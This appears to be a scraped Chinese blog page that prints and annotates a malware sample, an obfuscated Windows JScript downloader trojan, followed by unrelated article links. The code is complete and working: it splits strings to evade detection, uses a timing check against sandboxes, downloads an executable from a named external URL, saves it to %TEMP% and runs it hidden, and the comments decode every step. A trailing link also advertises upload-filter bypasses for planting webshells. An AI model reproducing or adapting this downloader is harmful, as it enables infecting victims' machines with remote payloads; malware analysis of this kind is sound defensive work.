//经过样本分析和抓取,该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";

var VLjBZijBRDIxir = "sd";

var mzHiDfbVgtzWL = "uhi";

var XrxesgIWQ = "ya";

var STgtocEaUgS = "f";

var Mccq = "gsd";

var YVFRNFKC = "a7o";

var zokYxgifSUOsDIn = "d8f";

var rysGOQRkJ = "hgs";

var fAJEpxv = "7";

var LzK = "u";

var WnKggbYjhbgaYK = "dfa";

var RQJm = "s";

var tcbpCSVm = "o";

var glYioNGTMO = "a";

var cMleB = "fkj";

var guMAPaymgfr = ";l";

var aWosZJAl = "d";

var rrruwakBVMdHT = "s";

var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------

var wxGM = "f";

var wME = "sd";

var WYl = "hi";

var DgXr = "yau";

var OFbjPAVgdUDSr = "sdf";

var AKaUjBxV = "g";

var YWyNEBKTCAr = "a7o";

var UmkNXPoXKvV = "8f";

var jrUTHQOJCXz = "d";

var VMrAuxWTPKwLZbj = "hgs";

var hnAKwB = "au7";

var kuRwVoQ = "f";

var OXjw = "d";

var wSaGYFaTjPu = "aos";

var UdT = "j";

var wGKytuRmi = "k";

var FwSAu = ";lf";

var uSsmxvh = "d";

var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

////---------------------------------

var fvJysePITGsZ = "f";

var MJLm = "sd";

var OHdTWUSWyLDnD = "hi";

var NfkoHHanka = "au";

var pAJLp = "fy";

var xTeQe = "d";

var wolngRcKPNjI = "s";

var Ctd0 = "og";

var NGJpEc = "a7";

var johMrZhTBT = "f";

var rWRr = "d8";

var xhuyvlXNtG = "gs";

var AoFEsd = "7h";

var IarTKEg = "fau";

var UiCusNVVRYpV = "osd";

var SqXtHDCTAOoEfv = "ja";

var kSXJa = "k";

var AzMZQADlr = ";lf";

var OFZC = "sd";

var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//-----------------------------------

var wiM = "ose";

var cdzFN = "l";

var gtVOEyZRPMBkY = "c";//close();

//-----------------------------------

var FKqYCuGSVDKEk = "e";

var yLdfoNQSLG = "Fil";

var Kegv = "o";

var REweUeFfsfzCC = "veT";

var mCxYdwKmDTeZ = "Sa";//savetofile();

//-----------------------------------

var orFCagIxftilPY = "on";

var AnB = "iti";

var OeuDh = "pos";//position

//-----------------------------------

var bxwfUYaplk = "e";

var ZHBIenDJhvi = "t";

var OmwNrBIs = "wri";//write()

//-----------------------------------

var IonAXHdnbsJsHYL = "e";

var svvPS = "typ";//type

//-----------------------------------

var RxDykD = "n";

var ftsB = "ope";//open

//-----------------------------------

var zZoO = "am";

var TSCSrKWiKQY = "tre";

var AIfn = "B.S";

var zbAsfUmIk = "D";

var uWdDgxvOZcUG = "O";

var MUSaOvH = "D";

var YZVOwlzLPfausz = "A";//"adodb.stream"

//-----------------------------------

var pNGkr = "ct";

var iqPSquxJgp = "je";

var bTJnufjW = "b";

var lIexL = "teO";

var kZBJ = "rea";

var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";

var WWzPWldMX = "6n";

var CuF0 = "k6j";

var oUHbKSEqhF = "0";

var lQP = "hu/";

var RQUOidonsf = "l.";

var NjKvurbzu = "ta";

var CSyCCMfj = "por";

var XcTxpkvH = "egy";

var aUucLqfydBnSn = "j";

var lTXzk = "ev";

var mpAARoVfxvEsej = ".n";

var NVJeSNhziHjX = "www";

var JFDhyk = "://";

var CFpmRSiBsMp = "p";

var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4

//-----------------------------------

var uBtUfBIHbmz = "T";

var LwKK = "GE";// get

//-----------------------------------

var KRPXN = "pen";

var HrNtkpOuBMYa = "o";//open

//-----------------------------------

var OFdMpJOyw = "e";

var NlpqQU = "x";

var cZpOdxEyvqRfb = "7.e";

var cLfbaiuobq = "PO";

var XmXyEnhbtWhG = "M1";

var DQZEGAm = "ko";

var cKoUGmrGJtE = "SE";

var QasyJ = "Ky";//KySEKoM1PO7.exe

//-----------------------------------

var eQyCEVqQUazI = "%/";

var tNgKCALxxEpJMf = "P";

var mNYqbv = "M";

var FrwlCZOPjcmJvoE = "E";

var KyNfXZkSc = "%T";//%TEMP%/

//-----------------------------------

var AjbjrFWcHO = "gs";

var RyW = "in";

var LVlachWJa = "Str";

var NGjUy = "t";

var ZXMail = "n";

var XLaaPawDhGaz = "e";

var lRTf = "m";

var EGxwfaNKp = "ron";

var UCOpd = "vi";

var xZQvOWiNMG = "n";

var NLgbSPQIDLAIj = "ndE";

var Gyo = "xpa";

var gPYeoLnn = "E";//expendenvironmentstrings

//-----------------------------------

var kpsxpufDRzihIGv = "TP";

var vGOfgZZdOVh = "T";

var wJOAaSUgz = "LH";

var bPhWMdYs = "XM";

var AwpqZN = "2.";

var RNVidTrApbBfHO = "XML";

var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp

//-----------------------------------

var zkeMzwunlwoMdUD = "n";

var oVQABSTeJWqKG = "Ru";

var WkRVEzGFpaMCAC = "ell";

var AoJg = "h";

var HDveUfs = "S";

var PGItzPyn = ".";

var iTVqHxcrEbduDt = "t";

var wxGWFQyhW = "rip";

var KDSFP = "c";

var nzV = "WS";//wscript.shell.run()

//-----------------------------------

var NFFhujLOFwsUs = "ct";

var kvZBOvoVgLSEG = "je";

var DXP = "b";

var zjRmzjunjFUys = "O";

var EcDMPFvaxG = "e";

var stMA = "at";

var KnALPhmOVixZ = "Cre";//createobject()

//-----------------------------------

var aCTc = new Date();

var SZT0 = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var bRDtyPAQicD = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var VrU = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var DEyWdL = aCTc.getMilliseconds();

//

var NdNAj = bRDtyPAQicD - SZT0;

//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();

//

//    10s

var HRORMjJ = VrU - bRDtyPAQicD;

//    10s

var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);

//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)

//{

//    WshShell[run](NLN,0,0);

//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)

//{

//    return MSxml2.xmlhttp;

//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path

//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);

//

//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();

//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}

windows本地script脚本恶意代码分析(带注释)的更多相关文章

  1. 2018-2019-2 20165234 《网络对抗技术》 Exp4 恶意代码分析

    实验四 恶意代码分析 实验目的 1.监控自己系统的运行状态,看有没有可疑的程序在运行. 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals ...

  2. 2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析 一.原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2 ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp4 恶意代码分析

    2018-2019-2 20165312<网络攻防技术>Exp4 恶意代码分析 知识点总结 1.有关schtasks schtacks的作用:安排命令和程序定期运行或在指定时间内运行.从计 ...

  4. Exp4 恶意代码分析 20165110

    Exp4 恶意代码分析 20165110 一.实践目标 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行. 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生 ...

  5. 2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析 原理与实践说明 实践目标 实践内容概述 基础问题回答 实践过程记录 1.使用schtasks指令监控系统 2.使用sys ...

  6. 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析

    目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...

  7. 2018-2019-2 20165332 《网络对抗技术》Exp4 恶意代码分析

    2018-2019-2 20165332 <网络对抗技术>Exp4 恶意代码分析 原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分 ...

  8. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  9. Exp4 恶意代码分析

    一.原理与实践说明 1. 实践目标 1.1 监控你自己系统的运行状态,看有没有可疑的程序在运行. 1.2 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysin ...

随机推荐

  1. ubuntu安装py27 spyder

    sudo apt-get install python-qt4 python-sphinx sudo pip install spyder sudo pip install -U spyder 一般网 ...

  2. 上传图片shell绕过过滤的几种方法

    一般网站图片上传功能都对文件进行过滤,防止webshelll写入.但不同的程序对过滤也不一样,如何突破过滤继续上传? 本文总结了七种方法,可以突破! 1.文件头+GIF89a法.(php)//这个很好 ...

  3. 。U盘安装CentOS6.5

    最近着手自学Linux,网上有很多CentOS的各种版本,但查阅到的教程基本都是关于CentOS6的,本着最新的版本并不一定是最适合的版本的原则,我选择安装CentOS6.5.安装系统稍微不注意就会出 ...

  4. Python if 和 for 的多种写法

    a, b, c = 1, 2, 3 [对比Cpp里:c = a >b? a:b]这个写法,Python只能常规的空行,缩进吗? 人生苦短,我用python,下面介绍几种if的方便的方法. 1.常 ...

  5. 办公大楼3D指纹门禁系统解决方案

    随着人们对工作.生活的自动化水平也提出了越来越高的要求.以大楼安保对出入大楼的外来人员进行登记放行或以铁锁.钥匙和卡为代表的出入管理方式已无法满足需求. 利用科技的手段,实现办公大楼的安全现代化.管理 ...

  6. Java开发中经典的小实例-(冒泡法)

    public class Test25 {    public static void main(String[] args) {        // 冒泡法        int[] array = ...

  7. Openstack+Kubernetes+Docker微服务实践之路--Docker和Registry2

    渐入佳境,我们开始比较具体的工作,由于Docker是一个基础组件,所以本文的主题是Docker和Registry2. 底层系统基于Centos7,先在一台云主机上安装Docker,Docker的安装非 ...

  8. JSON生成c#类代码小工具

    JSON生成c#类代码小工具 为什么写这么个玩意 最近的项目中需要和一个服务端程序通讯,而通讯的协议是基于流行的json,由于是.net,所以很简单的从公司代码库里找到了Newtonsoft.dll( ...

  9. java内存划分

    运行时数据区域 Java虚拟机在执行Java的过程中会把管理的内存划分为若干个不同的数据区域.这些区域有各自的用途,以及创建和销毁的时间,有的区域随着虚拟机进程的启动而存在,而有的区域则依赖线程的启动 ...

  10. 获取openid 的步骤

    1.引导客户打开 https://open.weixin.qq.com/connect/oauth2/authorize?appid=appid &redirect_uri=https://w ...